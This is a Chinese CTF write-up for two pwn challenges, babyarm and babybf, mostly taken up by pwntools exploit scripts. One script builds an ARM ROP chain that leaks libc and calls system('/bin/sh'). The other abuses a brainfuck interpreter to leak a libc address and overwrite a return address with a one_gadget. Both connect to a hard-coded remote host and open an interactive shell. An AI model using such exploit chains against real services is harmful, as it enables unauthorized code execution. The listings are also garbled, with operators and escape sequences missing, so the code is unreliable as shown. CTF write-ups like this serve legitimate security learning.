安洵杯WP

2022-12-01 15:53:53

太菜了,最后一个0解题不会,只会前两个简单的。

babyarm

Arm 架构的栈溢出。先对换表 base64 解一下,可以解出应输入的字符串是 s1mpl3Dec0d4r;然后就是 32 位下的栈溢出,exp 如下:

from pwn import *

#io = process("./chall")
# NOTE(review): the local process launch is commented out; the script talks
# directly to a hard-coded remote host:port. Everything below is tied to this
# exact challenge binary and the shipped libc-2.27 build.
io = remote("47.108.29.107",10392)
elf = ELF("./chall")
libc = ELF("./libc-2.27.so")

def input_pass() -> None:
    """Answer the ``msg> `` prompt with the decoded password string."""
    io.sendlineafter("msg> ","s1mpl3Dec0d4r")

def overflow(payload) -> None:
    """Send ``payload`` (a bytes object) at the ``comment> `` prompt."""
    io.sendlineafter("comment> ",payload)

# GOT/PLT entries are read from the ELF; the remaining addresses are
# hard-coded (presumably read off a disassembly of this exact build — they
# carry no meaning for any other binary).
read_got = elf.got["read"]
puts_plt = elf.plt["puts"]
#main_addr = elf.symbols["__libc_start_main"]
main_addr = 0x1050C
pop_r3_pc = 0x10464
pop_r4_r5_r6_r7 = 0x10cb0
mov_r0_r7 = 0x10ca0

input_pass()

# NOTE(review): the operators joining the terms of this line (and of the
# similar lines further down) were lost when the page was extracted; the
# listing is kept verbatim and does not parse as shown.
payload = b'a'*(0x2c)   p32(pop_r4_r5_r6_r7)   p32(0xdeadbeef)*3   p32(read_got)   p32(0xdeadbeef)*3   p32(pop_r3_pc)   p32(puts_plt)   p32(mov_r0_r7)   p32(main_addr)*0x10

overflow(payload)

# First stage: the first four bytes the service returns are taken as the
# resolved address of read(); subtracting its offset in libc-2.27 gives the
# library base.
libc_base = u32(io.recv()[0:4])
libc_base = libc_base - libc.symbols["read"]
success("libc base is leaked ==> "   hex(libc_base))

# The escape sequence in the search string below is also garbled in this copy.
sys_addr = libc_base   libc.symbols["system"]
bin_sh_addr = libc_base   next(libc.search(b'/bin/shx00'))

# Second stage: same chain shape as above, with the leaked libc addresses
# substituted in.
payload = b'a'*(0x2c)   p32(pop_r4_r5_r6_r7)   p32(0xdeadbeef)*3   p32(bin_sh_addr)   p32(0xdeadbeef)*3   p32(pop_r3_pc)   p32(sys_addr)   p32(mov_r0_r7)   p32(main_addr)*0x10

input_pass()
overflow(payload)

io.interactive()

babybf

brainfuck 解释器,brainfuck 各操作码的含义如下:

操作码

含义

>

ptr += 1

<

ptr -= 1

+

(*ptr) += 1

-

(*ptr) -= 1

.

putchar(*ptr)

,

getchar(ptr)

操作的是 rbp-0xA8,那么先用 > 来加指针,然后用 putchar 输出 __libc_start_main+231 的地址,再通过 getchar 读入 one_gadget 即可,exp 如下:

from pwn import *
#io = process("./chall")
# NOTE(review): as in the first script, the local process launch is commented
# out and a hard-coded remote host:port is used; the libc offsets below are
# specific to the shipped libc-2.27 build.
io = remote("47.108.29.107",10392)

elf = ELF("./chall")
libc = ELF("./libc-2.27.so")

context.arch = "amd64"
# "debug" makes pwntools log every byte sent and received, which is what the
# writeup's trace relies on.
context.log_level = "debug"

def length(leng) -> None:
    """Send the program length (as decimal text, no newline) at the ``len> `` prompt."""
    io.sendafter("len> ",str(leng))

def code(co) -> None:
    """Send the brainfuck program bytes ``co`` at the ``code> `` prompt."""
    io.sendafter("code> ",co)

# brainfuck opcode bytes as the interpreter expects them.
# NOTE: the names are inverted relative to the table above — `add`/`minus`
# are the pointer-move opcodes ('>'/'<'), while `ptr_add`/`ptr_minuns` are
# the cell increment/decrement ('+'/'-').
add = 0x3e # >
minus = 0x3c # <
ptr_add = 0x2b # +
ptr_minuns = 0x2d # -
putchar = 0x2e # .
getchar = 0x2c # ,
nop = 0x0

# NOTE(review): the operators joining the terms of this line (and of the
# similar lines below) were lost when the page was extracted; the listing is
# kept verbatim and does not parse as shown. The escape sequences in the
# recvuntil()/ljust() arguments further down are garbled the same way.
payload = p8(add)*0x58   p8(putchar)   (p8(add)   p8(putchar))*7
length(len(payload))
code(payload)
# Read back the bytes the program printed, take the last six as a pointer,
# and subtract the fixed offset (231 past __libc_start_main in this libc
# build) to obtain the libc base.
libc_base = u64(io.recvuntil("x7f")[-6:].ljust(8,b'x00')) - 231 - libc.symbols["__libc_start_main"]

success("libc base is leaked ==>"   hex(libc_base))

# one_gadget candidates for this libc-2.27 build; the first was tried and
# left commented out.
#ogg = libc_base   0x4f2a5
ogg = libc_base   0x4f302

payload=p8(add)*0x38   p8(getchar)   (p8(add)   p8(getchar))*7   p8(nop)

# Debugging hooks left in from local testing — presumably only useful when
# `io` is a local process rather than the remote tube configured above.
gdb.attach(io)
pause()

length(len(payload))
code(payload)

io.send(p64(ogg))

io.interactive()
